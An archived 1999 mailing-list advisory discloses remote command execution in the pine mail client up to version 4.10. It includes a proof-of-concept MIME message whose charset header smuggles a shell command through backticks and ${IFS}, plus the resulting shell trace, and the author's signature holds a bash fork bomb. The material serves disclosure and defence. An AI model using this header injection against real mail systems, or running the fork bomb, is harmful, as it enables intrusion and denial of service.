remote exploit on pine 4.10 - neverending story?

From: Michal Zalewski (lcamtufat_private)
Date: Sun Feb 07 1999 - 15:22:17 PST

Next message: Ragnar Hojland Espinosa: "Re: Cyrix bug: freeze in hell, badboy"

Previous message: Tomas Björklund: "More oshare testing (cont.)"
Next in thread: Anton Chuvakin: "Re: remote exploit on pine 4.10 - neverending story?"
Reply: Anton Chuvakin: "Re: remote exploit on pine 4.10 - neverending story?"
Reply: John D. Hardin: "Re: remote exploit on pine 4.10 - neverending story?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Affected systems:
-----------------

  Any Un*x system running 'pine' up to version 4.10 (latest).

Compromise:
-----------

  Remote execution of arbitrary code when message is viewed.

Details:
--------

  About five months ago, I reported vunerability in metamail package used
  with pine. I also noticed that '`' character is incorrectly expanded by
  pine. Problem has been ignored (probably noone understood what I am
  talking about?;-). But no matter. An exception from /etc/mailcap:

  text/plain; shownonascii iso-8859-1 %s; test=test "`echo %{charset} | tr
  '[A-Z]' '[a-z]'`" = iso-8859-1; copiousoutput

Impact:
-------

  And now, ladies and gentelmen - my old bug, reinvented. Usually, above
  mailcap line is expanded to:

  [...] execve </bin/sh> (sh) (-c) (test "`echo 'US-ASCII' | tr '[A-Z]'
        '[a-z]'`" = iso-8859-1)

  Hmm, but take a look at this message:

************************** MIME MESSAGE FOLLOWS **************************
From: Attacker <attackerat_private>
To: Victim <victimat_private>
Subject: Happy birthday
...
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset='US-ASCII'

Make a wish...

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
Content-Transfer-Encoding: BASE64
Content-Description: wish
Content-Disposition: attachment; filename="wish.c"

...it could be your last.
*************************** MIME MESSAGE ENDS ***************************

 The result is:

  [...] execve </bin/sh> (sh) (-c) (test "`echo '``touch${IFS}ME``' | tr
        '[A-Z]' '[a-z]'`" = iso-8859-1)

  ...and arbitrary code ('touch ME', encoded using ${IFS} trick) is
  executed when message is viewed.

Fix:
----

  Well, it's the second time I report problems with ` in headers.
  Maybe pine developers should wait a little longer ;-)

_______________________________________________________________________
Michal Zalewski [lcamtufat_private] [ENSI / marchew] [dione.ids.pl SYSADM]
[lunete.nfi.pl SYSADM] [http://dione.ids.pl/lcamtuf] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]

Next message: Ragnar Hojland Espinosa: "Re: Cyrix bug: freeze in hell, badboy"
Previous message: Tomas Björklund: "More oshare testing (cont.)"
Next in thread: Anton Chuvakin: "Re: remote exploit on pine 4.10 - neverending story?"
Reply: Anton Chuvakin: "Re: remote exploit on pine 4.10 - neverending story?"
Reply: John D. Hardin: "Re: remote exploit on pine 4.10 - neverending story?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:33:00 PDT